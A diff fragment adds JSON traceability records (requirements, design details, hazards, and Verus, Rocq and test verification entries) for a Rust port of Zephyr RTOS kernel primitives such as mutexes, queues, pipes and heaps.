+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "yield",
+        "asil-d"
+      ],
+      "title": "SC9: yield moves current thread to end of priority queue",
+      "type": "sw-req"
+    },
+    {
+      "description": "The system shall implement a poll event subsystem for monitoring multiple kernel objects simultaneously and receiving signal notifications.\n",
+      "id": "ZEP-SYRS-PL",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "poll"
+      ],
+      "title": "Zephyr: Poll Events",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "When append is called, the item count increments by 1. Maps to queue.c:197-213.\n",
+      "id": "SWREQ-QU-QU02",
+      "links": [
+        {
+          "target": "SYSREQ-QU-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-QU-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "queue",
+        "append",
+        "asil-d"
+      ],
+      "title": "QU2: append increments count by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "Property-based tests in tests/proptest_mutex.rs exercising invariant preservation under random operation sequences, lock-unlock roundtrip, reentrant depth tracking, contention state preservation, and non-owner/unlocked error paths.\n",
+      "id": "UV-MUT-002",
+      "links": [
+        {
+          "target": "SWDD-MUT-LOCK",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MUT-UNLOCK",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "proptest",
+        "swe-4"
+      ],
+      "title": "Mutex property-based tests (proptest)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Integration tests in tests/pipe_integration.rs exercising the full pipe API surface across module boundaries. Tests init validation, write/read basic and clamped, full/empty/closed/resetting error paths, reset/close semantics, conservation, zero-length rejection, streaming, and stress cycles.\n",
+      "id": "IV-PP-001",
+      "links": [
+        {
+          "target": "SWARCH-PP-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Pipe integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Rocq proof scripts in proofs/mem_slab_proofs.v targeting mem_slab block allocation counter invariant preservation via theorem proving on the coq_of_rust translation. Independent verification path from Verus. Executed via: bazel test //proofs:mem_slab_proofs_test\n",
+      "id": "FV-MS-002",
+      "links": [
+        {
+          "target": "SWREQ-MS-MS01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MS-MS02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MS-MS05",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "rocq",
+        "theorem-proving",
+        "swe-6"
+      ],
+      "title": "MemSlab Rocq theorem proofs (coq_of_rust)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "The alignment constraint must be a power of 2. Enforced by validate() checking alignment & (alignment - 1) == 0.\n",
+      "id": "SWREQ-SKS-SK05",
+      "links": [
+        {
+          "target": "SYSREQ-SKS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack-config",
+        "alignment",
+        "asil-d"
+      ],
+      "title": "SK_S5: alignment is power of 2",
+      "type": "sw-req"
+    },
+    {
+      "description": "For an active timeout, remaining returns max(0, expiry - curr_tick). For an inactive timeout, returns 0. Maps to timeout.c:168-193.\n",
+      "id": "SWREQ-TO-TO03",
+      "links": [
+        {
+          "target": "SYSREQ-TO-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeout",
+        "remaining",
+        "asil-d"
+      ],
+      "title": "TO3: timeout_remaining returns ticks until expiry",
+      "type": "sw-req"
+    },
+    {
+      "description": "Zephyr's byte-stream pipe with ring buffer backend.  Contains z_impl_k_pipe_init, z_impl_k_pipe_write, z_impl_k_pipe_read, z_impl_k_pipe_reset, z_impl_k_pipe_close.  The Gale port models the state machine (OPEN/CLOSED/RESETTING flags) and byte count — ring buffer management stays in C.\n",
+      "id": "PROV-PP-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "pipe",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/pipe.c — byte-stream pipe implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "If queue is full: return Err(ENOMSG). Otherwise retreat read_idx = (read_idx + max_msgs - 1) % max_msgs, increment used_msgs, return Ok(read_idx).\n",
+      "id": "SWDD-MQ-PUT-FRONT",
+      "links": [
+        {
+          "target": "SWARCH-MQ-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MQ-MQ04",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MQ-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "put-front"
+      ],
+      "title": "MsgQ::put_front — z_impl_k_msgq_put_front index retreat",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a mailbox that performs synchronous message exchange, where the sending thread blocks until a receiving thread has consumed the message.\n",
+      "id": "ZEP-SRS-MB-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MB",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-MB-MB01",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-MB-MB02",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mbox"
+      ],
+      "title": "Zephyr: Mailbox Synchronous Message Exchange",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Sys_heap chunk allocator model with init/alloc/free/aligned_alloc/ split/merge/coalesce_free/realloc. Tracks aggregate chunk counts and allocated bytes. No unsafe code. no_std compatible.\n",
+      "id": "SWARCH-HP-001",
+      "links": [
+        {
+          "target": "SWREQ-HP-HP01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-HP-HP02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-HP-HP03",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-HP-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "heap",
+        "architecture"
+      ],
+      "title": "Heap module (gale::heap)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Free is rejected when all chunks are already free, preventing double-free corruption.\n",
+      "id": "SWREQ-HP-HP05",
+      "links": [
+        {
+          "target": "SYSREQ-HP-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "heap",
+        "safety",
+        "asil-d"
+      ],
+      "title": "HP5: no double-free (chunk state tracking)",
+      "type": "sw-req"
+    },
+    {
+      "description": "If not locked (owner is None): return Err(EINVAL). If caller is not owner: return Err(EPERM). If lock_count > 1: decrement lock_count, return Released. If waiters exist: transfer ownership to highest-priority waiter, return Transferred. Otherwise: clear owner and lock_count, return Unlocked.\n",
+      "id": "SWDD-MUT-UNLOCK",
+      "links": [
+        {
+          "target": "SWARCH-MUT-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MUT-M06",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MUT-M07",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MUT-M08",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MUT-M09",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MUT-M10",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MUT-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "unlock"
+      ],
+      "title": "Mutex::unlock — z_impl_k_mutex_unlock port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Unit tests in plain/src/mbox.rs covering init, validate_send parameter checking, match_check with wildcard and exact thread IDs, data_exchange_size clamping, and no-match state preservation.\n",
+      "id": "UV-MB-001",
+      "links": [
+        {
+          "target": "SWDD-MB-VALIDATE-SEND",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MB-MATCH-CHECK",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MB-DATA-EXCHANGE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Mailbox unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "A generic queue that matches the Zephyr k_queue API semantics: initialization, append (enqueue at tail), prepend (enqueue at head), and get (dequeue from head). Must maintain item count bounds and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-QU-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-QU",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "queue",
+        "kernel"
+      ],
+      "title": "Generic queue with append/prepend/get semantics",
+      "type": "system-req"
+    },
+    {
+      "description": "Validate num_blocks > 0 and block_size > 0 (return Err(EINVAL) if either is zero). Set num_used = 0.\n",
+      "id": "SWDD-MS-INIT",
+      "links": [
+        {
+          "target": "SWARCH-MS-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MS-MS01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MS-MS02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MS-MS03",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MS-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-slab",
+        "init"
+      ],
+      "title": "MemSlab::init — k_mem_slab_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all userspace code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-US-003",
+      "links": [
+        {
+          "target": "SWREQ-US-US01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Userspace Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Check free chunks > 0 and bytes <= free capacity. Allocate slot ID, update counts. C source: lib/heap/heap.c lines 266-303.\n",
+      "id": "SWDD-HP-ALLOC",
+      "links": [
+        {
+          "target": "SWARCH-HP-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-HP-HP03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-HP-HP05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-HP-HP07",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-HP-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "heap",
+        "alloc"
+      ],
+      "title": "Heap::alloc — sys_heap_alloc port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "After power loss at any point during any operation (write, delete, GC), the storage subsystem shall recover to a consistent state upon next initialization.  Recovery shall preserve all previously committed data and discard any partially written entries.  No manual intervention or external recovery tool is required.\n",
+      "id": "SYSREQ-ZMS-003",
+      "links": [
+        {
+          "target": "STKH-ZMS-003",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "storage",
+        "power-loss",
+        "crash-consistency",
+        "zms"
+      ],
+      "title": "Power-loss recovery — consistent state after crash at any point",
+      "type": "system-req"
+    },
+    {
+      "description": "Validate transmit message parameters. Check tx_target is valid thread ID or K_ANY. Return Err(EINVAL) on invalid parameters.\n",
+      "id": "SWDD-MB-VALIDATE-SEND",
+      "links": [
+        {
+          "target": "SWARCH-MB-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MB-MB01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MB-MB02",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MB-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mbox",
+        "validate"
+      ],
+      "title": "Mbox::validate_send — message validation port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Verus specifications in src/timeout.rs with requires/ensures clauses that formally verify timeout properties (TO01-TO08) via SMT solving. Proves expiry computation, abort safety, remaining/announces correctness, and invariant preservation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-TO-001",
+      "links": [
+        {
+          "target": "SWREQ-TO-TO01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TO-TO02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TO-TO03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TO-TO04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TO-TO05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TO-TO06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TO-TO07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TO-TO08",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Timeout Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Verus specifications in src/msgq.rs with requires/ensures clauses that formally verify all msgq properties (MQ01-MQ13) via SMT solving. Proves ring buffer index safety, overflow protection, and invariant preservation. Includes proof lemmas for invariant induction, put-get roundtrip, purge-returns-empty, and fill-drain symmetry. Executed via: bazel test //:verus_test\n",
+      "id": "FV-MQ-001",
+      "links": [
+        {
+          "target": "SWREQ-MQ-MQ01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ08",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ09",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ10",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ11",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ12",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MQ-MQ13",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "MsgQ Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's fatal error subsystem. Contains z_fatal_error, k_fatal_halt, reason_to_str. The Gale port models fault classification and recovery decision logic only — IRQ lock, coredump, and thread abort stay in C.\n",
+      "id": "PROV-FT-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "fatal",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/fatal.c — fatal error handling",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Gale shall not increase FLASH usage by more than 10% compared to the equivalent Zephyr-only build for the same test application.\n",
+      "id": "SYSREQ-PERF-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "performance",
+        "binary-size"
+      ],
+      "title": "Binary size overhead within 10%",
+      "type": "system-req"
+    },
+    {
+      "description": "Establish confidence that Gale Rust implementations preserve the observable behavior of the original Zephyr C code. This covers functional equivalence testing, automated mirror generation, and specification independence from the C source.\n",
+      "id": "SYSREQ-TRACTOR-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "translation-validation",
+        "safety",
+        "system"
+      ],
+      "title": "Translation validation for C-to-Rust kernel porting",
+      "type": "system-req"
+    },
+    {
+      "description": "Condition variable as a pure wait queue wrapper. Provides signal (wake one), broadcast (wake all), and wait (block). No FFI layer — safety by composition via Zephyr's existing condvar.c. No unsafe code.\n",
+      "id": "SWARCH-CV-001",
+      "links": [
+        {
+          "target": "SWREQ-CV-C01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-CV-C02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-CV-C04",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-CV-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "condvar",
+        "architecture"
+      ],
+      "title": "CondVar module (gale::condvar)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "When stop is called, the status counter is reset to zero and the running flag is cleared.\n",
+      "id": "SWREQ-TM-TM04",
+      "links": [
+        {
+          "target": "SYSREQ-TM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TM-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "stop",
+        "asil-d"
+      ],
+      "title": "TM4: stop resets status and clears running",
+      "type": "sw-req"
+    },
+    {
+      "description": "The pipe buffer size is always strictly positive. Enforced by init rejecting size == 0 with -EINVAL. Maps to pipe.c:67-85.\n",
+      "id": "SWREQ-PP-PP02",
+      "links": [
+        {
+          "target": "SYSREQ-PP-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-PP-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "PP2: size > 0 (always after init)",
+      "type": "sw-req"
+    },
+    {
+      "description": "An unbounded priority inversion — a high-priority thread blocked on a mutex held by a low-priority thread that is itself preempted — delays a safety-critical operation past its deadline.\n",
+      "id": "H-2",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "mutex",
+        "priority-inversion"
+      ],
+      "title": "Mutex priority inversion causes timing violation",
+      "type": "hazard"
+    },
+    {
+      "description": "Calculate the actual data exchange size as min(tx_size, rx_size). Neither buffer is overflowed.\n",
+      "id": "SWDD-MB-DATA-EXCHANGE",
+      "links": [
+        {
+          "target": "SWARCH-MB-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MB-MB04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MB-MB06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MB-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mbox",
+        "data-exchange"
+      ],
+      "title": "Mbox::data_exchange_size — mbox_message_dispose port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Integration tests in tests/condvar_integration.rs exercising the full condvar API surface across module boundaries. Tests init, signal/broadcast semantics, wait blocking, priority ordering, signal-broadcast equivalence, reuse after broadcast, and idempotent broadcast.\n",
+      "id": "IV-CV-001",
+      "links": [
+        {
+          "target": "SWARCH-CV-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "CondVar integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all ring_buf code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-RB-003",
+      "links": [
+        {
+          "target": "SWREQ-RB-RB01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "RingBuf Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Reset status to 0, set period to given value, set running = true.\n",
+      "id": "SWDD-TM-START",
+      "links": [
+        {
+          "target": "SWARCH-TM-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TM-TM03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TM-TM06",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TM-TM07",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TM-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "start"
+      ],
+      "title": "Timer::start — z_impl_k_timer_start port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Compute expiry = curr_tick + ticks. Insert timeout into sorted list maintaining ascending expiry order.\n",
+      "id": "SWDD-TO-ADD",
+      "links": [
+        {
+          "target": "SWARCH-TO-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TO-TO01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TO-TO07",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TO-TO08",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TO-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeout",
+        "add"
+      ],
+      "title": "Timeout::add — z_add_timeout port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Integration tests exercising full init sequence across levels with dependency checking.\n",
+      "id": "IV-DI-001",
+      "links": [
+        {
+          "target": "SWARCH-DI-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "DeviceInit integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Unit tests in src/userspace.rs covering new (no perms), grant_access (valid/invalid tid), revoke_access, check_access (supervisor/public/ per-thread/invalid-tid), validate (type mismatch, no perm, init check), init_object, uninit_object, recycle, make_public, and has_perm.\n",
+      "id": "UV-US-001",
+      "links": [
+        {
+          "target": "SWDD-US-VALIDATE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Userspace unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's event object.  Contains z_impl_k_event_init, z_impl_k_event_post, z_impl_k_event_set, z_impl_k_event_clear, z_impl_k_event_set_masked, z_impl_k_event_wait, plus userspace wrappers and poll integration. The Gale port models the bitmask operations only.\n",
+      "id": "PROV-EV-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "event",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/events.c — event object implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Free memory to sys_heap, unpend all waiters, reschedule if any woken. C source: kernel/kheap.c lines 206-218.\n",
+      "id": "SWDD-KH-FREE",
+      "links": [
+        {
+          "target": "SWARCH-KH-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-KH-KH05",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-KH-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "kheap",
+        "free",
+        "wake"
+      ],
+      "title": "KHeap::free — k_heap_free port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Verus-verified src/userspace.rs with requires/ensures contracts covering permission bit grants, revocations, type validation, supervisor bypass, initialization checks (US1-US8). Flags modeled as individual bools; thread permissions as [bool;64] array to avoid Z3 bitwise limitations. Passing via bazel test //:verus_test.\n",
+      "id": "FV-US-001",
+      "links": [
+        {
+          "target": "SWREQ-US-US01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-US-US02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-US-US03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-US-US04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-US-US05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-US-US06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-US-US07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-US-US08",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Userspace Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "A thread lifecycle subsystem that matches the Zephyr thread semantics: thread creation with stack and entry point, delayed start, priority and option configuration, abort with cleanup, join with blocking wait, and essential-thread enforcement. Must maintain thread state invariants and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-TL-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-TL",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "thread",
+        "lifecycle",
+        "kernel"
+      ],
+      "title": "Thread lifecycle management (create/start/abort/join)",
+      "type": "system-req"
+    },
+    {
+      "description": "The sum of free and allocated blocks always equals the pool capacity.\n",
+      "id": "SWREQ-MP-MP05",
+      "links": [
+        {
+          "target": "SYSREQ-MP-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MP-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mempool",
+        "conservation",
+        "asil-d"
+      ],
+      "title": "MP5: conservation: free_blocks + allocated == capacity",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a pipe that transfers an arbitrary-length stream of bytes between threads.\n",
+      "id": "ZEP-SRS-PP-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-PP",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-PP-PP01",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-PP-PP02",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "pipe"
+      ],
+      "title": "Zephyr: Pipe Byte Stream",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Verus specifications in src/device_init.rs with requires/ensures clauses that formally verify device init properties (DI1-DI5) via SMT solving. Proves init sequence ordering, dependency checking, double-init rejection, and level advancement. Executed via: bazel test //:verus_test\n",
+      "id": "FV-DI-001",
+      "links": [
+        {
+          "target": "SWREQ-DI-DI01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-DI-DI02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-DI-DI03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-DI-DI04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-DI-DI05",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "DeviceInit Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Code review of each excluded trivial module (banner, version, errno, float_context, busy_wait, boot_args, compiler_stack_protect, irq_offload, sys_clock, main_weak, nothread) confirms absence of state machines, overflow-prone arithmetic, and synchronization primitives. Documented rationale in SWARCH-MON-001. Full Zephyr test suite passes with trivial modules at upstream C.\n",
+      "id": "SV-TRIV-001",
+      "links": [
+        {
+          "target": "SYSREQ-TRIV-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "trivial",
+        "sys-5"
+      ],
+      "title": "Trivial module exclusion system verification",
+      "type": "sys-verification"
+    },
+    {
+      "description": "The semaphore count must satisfy the invariant 0 <= count <= limit at all times.  Give operations must saturate at limit; take operations must not decrement below zero.  Proven by FV-SEM-001 (Verus) and FV-SEM-002 (Rocq) against SWREQ-SEM-P01/P02/P03.\n",
+      "id": "SC-3",
+      "links": [
+        {
+          "target": "H-3",
+          "type": "prevents"
+        },
+        {
+          "target": "SWREQ-SEM-P01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SEM-P02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SEM-P03",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "semaphore"
+      ],
+      "title": "Semaphore count must be bounded within [0, limit]",
+      "type": "system-constraint"
+    },
+    {
+      "description": "The Zephyr RTOS shall halt the system when a fatal error occurs in ISR context or when the faulting thread is marked essential, as recovery is not possible in these cases.\n",
+      "id": "ZEP-SRS-FT-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-FT",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-FT-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "fatal"
+      ],
+      "title": "Zephyr: System Halt on Unrecoverable Error",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "When a poll signal is reset, the signaled flag is cleared to 0 and the result is reset. Maps to poll.c:494-499.\n",
+      "id": "SWREQ-PL-PL05",
+      "links": [
+        {
+          "target": "SYSREQ-PL-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-PL-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "poll",
+        "signal",
+        "reset",
+        "asil-d"
+      ],
+      "title": "PL5: signal_reset clears signaled flag",
+      "type": "sw-req"
+    },
+    {
+      "description": "While the semaphore's count is greater than zero, the requesting thread shall acquire the semaphore and decrement its count.\n",
+      "id": "ZEP-SRS-5-7",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
